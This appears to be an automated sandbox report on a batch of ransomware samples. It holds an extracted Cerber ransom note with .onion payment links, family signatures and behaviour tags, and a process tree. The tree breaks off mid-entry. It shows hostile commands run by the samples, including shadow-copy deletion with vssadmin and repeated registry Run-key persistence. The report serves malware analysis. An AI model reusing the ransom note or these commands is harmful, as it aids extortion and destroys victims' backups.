jmqo2DL1Uys30yDJ2GWkVJjnedeP45xeHcW45uNqvPiTbIwdUN3CkPHBjpk8xOdD CLuqbjFTklTabb6CAF+9T2gQvUykJL0vxszEBNwf+eUbBfQnmNXFMHJVo2yR7un6 de8JnlPZ9Zigl6AlrCsLvR9Hav7gUGuhQwsE2yeB/OfUxJ3wZVn9qEji7WBQsrYu WWfe1lhghYXQnbM9cJzBvg5j3v/5ZSdKfOoNVzQZg9oPMFasJW2Mug/GzSPiwwrk OSdr3FHV/tdN3xQ5K4H4UOobR1LajutSGYicA0tuSrIajrrxlxsPWhdJKSr6hmXr ZO8zt02HviNspmT6wDyuctdV9L52mRyRRG4abUTPhSiPWAQw3gqi08bM/+ol8JAs WFxcNdwYz0RwnSjRYnJzBUlpfaoU5HOZ/hlI80wakraqgqlqkUnt/ucHBNj+Gi82 Ixb7E0Yww8Sm1v7iV7TacZsUdLd5+4BthpbHdO5/EJWL4Dnylix1cc9Wt6RTxmti AJEazUzYPxrfn0low0vcgK/HCPizEbvirK9XlvfKD1+PmRS6k7rW0qKXsG2HFy6j qXEhkamYHovwltb8HNcL+WstdMUwXTLP3hZsa0Y0tQ/LP7gQlxqXiQfF0E/8m5yJ x04CCDcYkqO2eGI2tOhqw5OKPlSQggi2k8px+tHM2nQfAjfvnvCWP/CcmMdpbW/s OX3iTwas1XlVZieX7vcPy8ktlcsOSXOFGQoI2Dm2/9iI06XmO0Z8SbZCzH8VabHV cLUjlGliQisVKRVPgzNIiicQxvtyxpTLqkOxa8aL0vhcjj2b+SehJneIlQWyvtYH YGbrM1hS3VSEqdVVMcYDt+aUcHqk3T4UbnzVVGeXHL2BgBdpAkGsx5m79xrc0gGX t/erlHmYGWxuEnIYEME9bM3G7EAB0ILh2vdVqIoaE+ed2T0k/f6tRi/fRoXvTKgH PT8Z1PZAqnPvRE7UPO9lyAebG10sWek7t6go/DzDkSasfmyAXiNHj+gkNBiHHT+2 pwAUJVOxeednsoJ/GktHqbyzMOpPkNxJe5Yw/YqkUH47clBpNK1qR0DJ+Z0HxkT8 TFoEhYCXH+s6Ph84LnueWHUtBo03lIZ610CMMRc9xhGW25QyhfEyxiAwC/eWzD7r oqnR2wRv1CDXLxUcn74K6l876I9eD4Kl1ueevnhvZLAgLiW0zPEd3e3qj/QixKpY QkFCCl6zW+rbuP4mRzdm/UxFN/wUuBzoh6Q4OdXXe2aLDuNygOGAPzrvpl2zO+Hf YXdW6SWday/wH/BeZDVxr9c1xwr2SUGo6dl9o1FeNCvTyZbAotlTLvLpv3cvwwH4 UBeeWP465IwhwOfIM+3pLuIb9XIUOQMEWLt5wMvSEZ1iMgHFzAsq95LxtOW8Q/0Y RR8iiZaoq37l2kGeuX5WTJ1nD5r33hdj7MEbMNwohMkKMig+9LtipXHlgRm3Ju4X cGI= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FA3B0F6938582C86

http://decryptor.cc/FA3B0F6938582C86

Extracted

Path

C:\Users\Admin\AppData\Roaming\at\# DECRYPT MY FILES #.txt

Family

cerber

Ransom Note
C E R B E R R A N S O M W A R E ######################################################################### Cannot you find the files you need? Is the content of the files that you looked for not readable? It is normal because the files' names, as well as the data in your files have been encrypted. Great! You have turned to be a part of a big community "#Cerber Ransomware". ######################################################################### !!! If you are reading this message it means the software "Cerber" has !!! been removed from your computer. !!! HTML instruction ("# DECRYPT MY FILES #.html") always contains a !!! working domain of your personal page! ######################################################################### What is encryption? ------------------- Encryption is a reversible modification of information for security reasons but providing full access to it for authorized users. To become an authorized user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an individual private key. But not only it. It is required also to have the special decryption software (in your case "Cerber Decryptor" software) for safe and complete decryption of all your files and data. ######################################################################### Everything is clear for me but what should I do? ------------------------------------------------ The first step is reading these instructions to the end. Your files have been encrypted with the "Cerber Ransomware" software; the instructions ("# DECRYPT MY FILES #.html" and "# DECRYPT MY FILES #.txt") in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the "Cerber Ransomware" where they find a lot of ideas, recommendations and instructions. It is necessary to realize that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them. !!! Any attempts to get back your files with the third-party tools can !!! be fatal for your encrypted files. The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files. When you make a puzzle, but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realize that any intervention of the third-party software to restore files encrypted with the "Cerber Ransomware" software may be fatal for your files. ######################################################################### !!! There are several plain steps to restore your files but if you do !!! not follow them we will not be able to help you, and we will not try !!! since you have read this warning already. ######################################################################### For your information the software to decrypt your files (as well as the private key provided together) are paid products. After purchase of the software package you will be able to: 1. decrypt all your files; 2. work with your documents; 3. view your photos and other media; 4. continue your usual and comfortable work at the computer. If you understand all importance of the situation then we propose to you to go directly to your personal page where you will receive the complete instructions and guarantees to restore your files. ######################################################################### There is a list of temporary addresses to go on your personal page below: _______________________________________________________________________ | | 1. http://bqyjebfh25oellur.onion.to/68D2-9176-A03E-0072-8872 | | 2. http://bqyjebfh25oellur.onion.cab/68D2-9176-A03E-0072-8872 | | 3. http://bqyjebfh25oellur.onion.nu/68D2-9176-A03E-0072-8872 | | 4. http://bqyjebfh25oellur.onion.link/68D2-9176-A03E-0072-8872 | | 5. http://bqyjebfh25oellur.tor2web.org/68D2-9176-A03E-0072-8872 |_______________________________________________________________________ ######################################################################### What should you do with these addresses? ---------------------------------------- If you read the instructions in TXT format (if you have instruction in HTML (the file with an icon of your Internet browser) then the easiest way is to run it): 1. take a look at the first address (in this case it is http://bqyjebfh25oellur.onion.to/68D2-9176-A03E-0072-8872); 2. select it with the mouse cursor holding the left mouse button and moving the cursor to the right; 3. release the left mouse button and press the right one; 4. select "Copy" in the appeared menu; 5. run your Internet browser (if you do not know what it is run the Internet Explorer); 6. move the mouse cursor to the address bar of the browser (this is the place where the site address is written); 7. click the right mouse button in the field where the site address is written; 8. select the button "Insert" in the appeared menu; 9. then you will see the address http://bqyjebfh25oellur.onion.to/68D2-9176-A03E-0072-8872 appeared there; 10. press ENTER; 11. the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address if falling. If for some reason the site cannot be opened check the connection to the Internet; if the site still cannot be opened take a look at the instructions on omitting the point about working with the addresses in the HTML instructions. If you browse the instructions in HTML format: 1. click the left mouse button on the first address (in this case it is http://bqyjebfh25oellur.onion.to/68D2-9176-A03E-0072-8872); 2. in a new tab or window of your web browser the site should be loaded; if it is not loaded repeat the same instructions with the second address and continue until the last address. If for some reason the site cannot be opened check the connection to the Internet. ######################################################################### Unfortunately these sites are short-term since the antivirus companies are interested in you do not have a chance to restore your files but continue to buy their products. Unlike them we are ready to help you always. If you need our help but the temporary sites are not available: 1. run your Internet browser (if you do not know what it is run the Internet Explorer); 2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER; 3. wait for the site loading; 4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed; 5. run Tor Browser; 6. connect with the button "Connect" (if you use the English version); 7. a normal Internet browser window will be opened after the initialization; 8. type or copy the address ________________________________________________________ | | | http://bqyjebfh25oellur.onion/68D2-9176-A03E-0072-8872 | |________________________________________________________| in this browser address bar; 9. press ENTER; 10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again. If you have any problems during installation or operation of Tor Browser, please, visit https://www.youtube.com/ and type request in the search bar "install tor browser windows" and you will find a lot of training videos about Tor Browser installation and operation. If TOR address is not available for a long period (2-3 days) it means you are late; usually you have about 2-3 weeks after reading the instructions to restore your files. ######################################################################### Additional information: You will find the instructions for restoring your files in those folders where you have your encrypted files only. The instructions are made in two file formats - HTML and TXT for your convenience. Unfortunately antivirus companies cannot protect or restore your files but they can make the situation worse removing the instructions how to restore your encrypted files. The instructions are not viruses; they have informative nature only, so any claims on the absence of any instruction files you can send to your antivirus company. ######################################################################### Cerber Ransomware Project is not malicious and is not intended to harm a person and his/her information data. The project is created for the sole purpose of instruction regarding information security, as well as certification of antivirus software for their suitability for data protection. Together we make the Internet a better and safer place. ######################################################################### If you look through this text in the Internet and realize that something is wrong with your files but you do not have any instructions to restore your files, please, contact your antivirus support. ######################################################################### Remember that the worst situation already happened and now it depends on your determination and speed of your actions the further life of your files.
URLs

http://bqyjebfh25oellur.onion.to/68D2-9176-A03E-0072-8872

http://bqyjebfh25oellur.onion.cab/68D2-9176-A03E-0072-8872

http://bqyjebfh25oellur.onion.nu/68D2-9176-A03E-0072-8872

http://bqyjebfh25oellur.onion.link/68D2-9176-A03E-0072-8872

http://bqyjebfh25oellur.tor2web.org/68D2-9176-A03E-0072-8872

http://bqyjebfh25oellur.onion/68D2-9176-A03E-0072-8872

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Avaddon

    Ransomware-as-a-service first released in June 2020 and currently expanding its userbase among criminal actors.

    ransomwareavaddon
  • Avaddon family
    avaddon
  • Cerber

    Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

    ransomwarecerber
  • Cerber family
    cerber
  • GandCrab payload 2 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Gandcrab family
    gandcrab
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

    ratlimerat
  • Limerat family
    limerat
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Sodinokibi family
    sodinokibi
  • Async RAT payload 1 IoCs
    rat
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Contacts a large (540) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 2 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 2 IoCs
    installer
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00402.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2592
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3732
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5054cdfd0f9c2501bf96ae23cc771dcbdf6beeba07e7cbe7520f76473b21d392.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-5054cdfd0f9c2501bf96ae23cc771dcbdf6beeba07e7cbe7520f76473b21d392.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2460
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 1168
          4⤵
          • Program crash
          PID:408
      • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Blocker.gen-4e665ab21ff5a1d2b69bef16b37c98dc1bb502382213de23cb2a9254c7779c72.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-4e665ab21ff5a1d2b69bef16b37c98dc1bb502382213de23cb2a9254c7779c72.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\BandizipPortable.exe
          "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\BandizipPortable.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4280
      • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Crypmod.vho-f449cb60b185851cba27420b3f959c88cf121838157bc33918e8c7bffd8b7cc3.exe
        HEUR-Trojan-Ransom.Win32.Crypmod.vho-f449cb60b185851cba27420b3f959c88cf121838157bc33918e8c7bffd8b7cc3.exe
        3⤵
        • Executes dropped EXE
        PID:2496
      • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Crypren.gen-ae32afd2b186415adad6cf452334a8daf1e2a5f918772dc8b178629b0bc5921b.exe
        HEUR-Trojan-Ransom.Win32.Crypren.gen-ae32afd2b186415adad6cf452334a8daf1e2a5f918772dc8b178629b0bc5921b.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1984
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe"
          4⤵
            PID:5948
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              5⤵
                PID:7700
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                5⤵
                • Interacts with shadow copies
                PID:10776
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              4⤵
                PID:7096
                • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                  "C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe"
                  5⤵
                    PID:10280
                  • C:\Windows\system32\mode.com
                    mode con cp select=1251
                    5⤵
                      PID:6212
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      5⤵
                      • Interacts with shadow copies
                      PID:5184
                  • C:\Windows\System32\mshta.exe
                    "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                    4⤵
                      PID:11444
                    • C:\Windows\System32\mshta.exe
                      "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                      4⤵
                        PID:6512
                    • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Encoder.gen-0ccb966a94a1f2864f483fd2cdb69fa4132dd9faf25ee6f2dfaeaba04cfb7920.exe
                      HEUR-Trojan-Ransom.Win32.Encoder.gen-0ccb966a94a1f2864f483fd2cdb69fa4132dd9faf25ee6f2dfaeaba04cfb7920.exe
                      3⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:3096
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\עברית.bat" "
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3700
                    • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-7a17bc2c51be7c31dd61dce4a5f9fe707a987e7399a668d7fe15d3630d538849.exe
                      HEUR-Trojan-Ransom.Win32.GandCrypt.gen-7a17bc2c51be7c31dd61dce4a5f9fe707a987e7399a668d7fe15d3630d538849.exe
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:3056
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 480
                        4⤵
                        • Program crash
                        PID:4676
                    • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Generic-25c9f98829a02d41292023246e0143ec6e0201b7f9c079bd5d3156a9f940ec4f.exe
                      HEUR-Trojan-Ransom.Win32.Generic-25c9f98829a02d41292023246e0143ec6e0201b7f9c079bd5d3156a9f940ec4f.exe
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:1516
                      • C:\Users\Admin\AppData\Roaming\Para Verificar.exe
                        "C:\Users\Admin\AppData\Roaming\Para Verificar.exe" C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Generic-25c9f98829a02d41292023246e0143ec6e0201b7f9c079bd5d3156a9f940ec4f.exe
                        4⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Modifies registry class
                        • Suspicious use of WriteProcessMemory
                        PID:2984
                        • C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe
                          "C:\Users\Admin\AppData\Roaming\Windows Objects\wmiintegrator.exe" unk
                          5⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:4448
                          • C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe
                            "C:\Users\Admin\AppData\Roaming\Windows Objects\wmihostwin.exe" unk2
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2844
                            • C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe
                              "C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe" unk3
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1932
                              • C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe
                                "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure.exe" execute
                                8⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:4056
                              • C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe
                                "C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun
                                8⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:4428
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                  9⤵
                                    PID:4888
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                    9⤵
                                      PID:4024
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                      9⤵
                                        PID:2492
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                        9⤵
                                          PID:5172
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                          9⤵
                                            PID:8660
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                            9⤵
                                              PID:6192
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                              9⤵
                                                PID:8616
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                9⤵
                                                  PID:5788
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                  9⤵
                                                    PID:5764
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                    9⤵
                                                      PID:5868
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                      9⤵
                                                        PID:5628
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                        9⤵
                                                          PID:8752
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                          9⤵
                                                            PID:5264
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                            9⤵
                                                              PID:10872
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                              9⤵
                                                                PID:11928
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                9⤵
                                                                  PID:10040
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                  9⤵
                                                                    PID:10616
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                    9⤵
                                                                      PID:7956
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                      9⤵
                                                                        PID:5556
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                        9⤵
                                                                          PID:11228
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                          9⤵
                                                                            PID:9208
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                            9⤵
                                                                              PID:10788
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                              9⤵
                                                                                PID:10064
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                9⤵
                                                                                  PID:9692
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                  9⤵
                                                                                    PID:6868
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                    9⤵
                                                                                      PID:11520
                                                                                    • C:\Windows\SysWOW64\reg.exe
